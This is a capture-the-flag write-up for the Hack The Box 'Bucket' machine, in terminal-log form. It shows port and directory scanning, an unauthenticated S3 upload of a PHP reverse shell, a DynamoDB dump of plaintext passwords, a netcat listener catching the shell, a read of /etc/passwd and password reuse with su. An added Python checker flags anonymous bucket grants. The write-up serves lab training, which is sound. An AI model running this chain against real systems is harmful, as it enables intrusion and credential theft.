bucket

Introduction:
Recon
eneloop@kinetic:…/hackthebox/bucket/data$ sudo nmap -sS -sC -sV -T4 -O -oN nmap.bucket.txt 10.10.10.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-02 21:35 EST
Nmap scan report for 10.10.10.212
Host is up (0.014s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.22 seconds
Enumeration
Information gathered from view-source: (view-source:http://bucket.htb)
email : [email protected]
New subdomain - s3.bucket.htb
echo "10.10.10.212 bucket.htb bucket s3.bucket.htb" | sudo tee -a /etc/hosts
===============================================================
eneloop@kinetic:…/hackthebox/bucket/data$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://s3.bucket.htb -x php,txt,cfg,conf
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: http://s3.bucket.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,cfg,conf
[+] Timeout: 10s
2021/02/02 22:05:52 Starting gobuster
/health (Status: 200)
/shell (Status: 200)
Exploitation
root@kinetic:…/bucket/data/payload# aws --endpoint-url http://s3.bucket.htb s3 ls
2021-02-03 20:12:05 adserver
root@kinetic:…/bucket/data/payload# aws --endpoint-url http://s3.bucket.htb s3 ls s3://adserver
                           PRE images/
2021-02-03 20:12:05       5344 index.html
root@kinetic:…/bucket/data/payload# aws --endpoint-url http://s3.bucket.htb s3 ls s3://adserver/images
                           PRE images/
root@kinetic:…/bucket/data/payload# aws --endpoint-url http://s3.bucket.htb s3 ls s3://adserver/images/
2021-02-03 20:12:05      37840 bug.jpg
2021-02-03 20:12:05      51485 cloud.png
2021-02-03 20:12:05      16486 malware.png
root@kinetic:…/bucket/data/payload# aws --endpoint-url http://s3.bucket.htb s3 cp /oscp/tools/reverse-shell/php/shell.php s3://adserver/images/shell.php
upload: ../../../../../../../../tools/reverse-shell/php/shell.php to s3://adserver/images/shell.php
root@kinetic:…/bucket/data/payload# aws --endpoint-url http://s3.bucket.htb s3 ls s3://adserver/images/
2021-02-03 20:14:04      37840 bug.jpg
2021-02-03 20:14:04      51485 cloud.png
2021-02-03 20:14:04      16486 malware.png
2021-02-03 20:15:52       3460 shell.php
root@kinetic:…/bucket/data/payload# aws --endpoint-url http://s3.bucket.htb s3 ls s3://adserver/images/
2021-02-03 20:16:03      37840 bug.jpg
2021-02-03 20:16:03      51485 cloud.png
2021-02-03 20:16:03      16486 malware.png
root@kinetic:…/bucket/data/payload# aws --endpoint-url http://s3.bucket.htb s3 cp /oscp/tools/reverse-shell/php/shell.php s3://adserver/images/shell.php
upload: ../../../../../../../../tools/reverse-shell/php/shell.php to s3://adserver/images/shell.php
root@kinetic:…/bucket/data/payload# aws --endpoint-url http://s3.bucket.htb s3 ls s3://adserver/images/
2021-02-03 20:16:03      37840 bug.jpg
2021-02-03 20:16:03      51485 cloud.png
2021-02-03 20:16:03      16486 malware.png
2021-02-03 20:16:54       3460 shell.php
root@kinetic:…/bucket/data/payload# aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
TABLENAMES      users
root@kinetic:…/bucket/data/payload# aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users
None    3       3
PASSWORD        Management@#1@#
USERNAME        Mgmt
PASSWORD        Welcome123!
USERNAME        Cloudadm
PASSWORD        n2vM-<_K_Q:.Aa2
USERNAME        Sysadm
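The bucket listing and upload above succeeded without credentials. As an added example (not part of the original write-up, and not the target's configuration, which the page does not show), this Python check flags bucket-policy statements that grant s3:ListBucket or s3:PutObject to anonymous principals. Both sample policies, the role name and the account ID are constructed placeholders.

```python
import fnmatch

# Actions the unauthenticated CLI session relied on: listing and uploading.
RISKY_ACTIONS = ("s3:ListBucket", "s3:PutObject")

def _as_list(value):
    """Policy fields may hold one string or a list of strings."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)

def _is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"} (string or list form)."""
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return principal == "*"

def anonymous_grants(policy):
    """Return sorted (Sid, action) pairs that Allow a risky action to anyone.
    Statements with a Condition are skipped here and need manual review."""
    findings = set()
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):      # a single statement is also valid
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        if not _is_anonymous(stmt.get("Principal")):
            continue
        for pattern in _as_list(stmt.get("Action")):
            for action in RISKY_ACTIONS:
                # Action names are case-insensitive; * and ? are wildcards.
                if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                    findings.add((stmt.get("Sid", "<no Sid>"), action))
    return sorted(findings)

# Constructed sample policies: a wide-open one beside a corrected one.
WEAK = {"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicAll", "Effect": "Allow", "Principal": "*", "Action": "s3:*",
     "Resource": ["arn:aws:s3:::adserver", "arn:aws:s3:::adserver/*"]}]}
HARDENED = {"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicReadImages", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::adserver/images/*"},
    {"Sid": "DeployerWrite", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::111122223333:role/deployer"},
     "Action": ["s3:PutObject", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::adserver", "arn:aws:s3:::adserver/*"]}]}
```

anonymous_grants(WEAK) reports both risky actions for the PublicAll statement, while HARDENED yields no findings because writes and listing are limited to a named role.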
eneloop@kinetic:…/tools/reverse-shell/php$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.212] 54698
Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 01:17:08 up 12 min, 0 users, load average: 0.03, 0.09, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
$ whoami
www-data
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
roy:x:1000:1000:,,,:/home/roy:/bin/bash
$
$ su - roy
Password: Management@#1@#
su: Authentication failure
$ su - roy
Password: Welcome123!
su: Authentication failure
$ su - roy
Password: n2vM-<_K_Q:.Aa2
ls
project
user.txt
whoami
roy
Post-exploit/PrivEsc
Notes: